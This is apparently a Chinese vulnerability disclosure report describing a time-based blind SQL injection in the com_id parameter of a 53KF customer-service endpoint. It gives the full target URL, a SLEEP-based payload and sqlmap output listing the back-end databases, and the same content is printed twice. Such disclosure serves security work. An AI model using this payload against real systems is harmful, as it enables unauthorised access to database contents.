### 简要描述:
rt
### 详细说明:
53KF的客服系统存在sql注入
晚上你们服务器有waf 好不容易绕过了
早上发现却没有了 奇怪
www5.53kf.com/fenci/robot_fenci.php?cmd=CR&com_id=72000079&robot_id=971b5d68cdd2d141e86978b8afa02f21&q_id=1e278e4878dc8de61694c69482d20b6d&val=4
com_id存在注入
```
Place: GET
Parameter: com_id
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: cmd=CR&com_id=72000079' AND SLEEP(5) AND 'SvIC'='SvIC&robot_id=971b5d68cdd2d141e86978b8afa02f21&q_id=1e278e4878dc8de61694c69482d20b6d&val=4
---
[10:10:24] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
[10:10:24] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www5.53kf.com'
```
```
available databases [4]:
[*] information_schema
[*] ip
[*] talk
[*] test
```
对应库234个 盲注太慢
### 漏洞证明:
53KF的客服系统存在sql注入
晚上你们服务器有waf 好不容易绕过了
早上发现却没有了 奇怪
www5.53kf.com/fenci/robot_fenci.php?cmd=CR&com_id=72000079&robot_id=971b5d68cdd2d141e86978b8afa02f21&q_id=1e278e4878dc8de61694c69482d20b6d&val=4
com_id存在注入
```
Place: GET
Parameter: com_id
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: cmd=CR&com_id=72000079' AND SLEEP(5) AND 'SvIC'='SvIC&robot_id=971b5d68cdd2d141e86978b8afa02f21&q_id=1e278e4878dc8de61694c69482d20b6d&val=4
---
[10:10:24] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
[10:10:24] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www5.53kf.com'
```
```
available databases [4]:
[*] information_schema
[*] ip
[*] talk
[*] test
```
对应库234个 盲注太慢
京公网安备 11010502034610号
暂无评论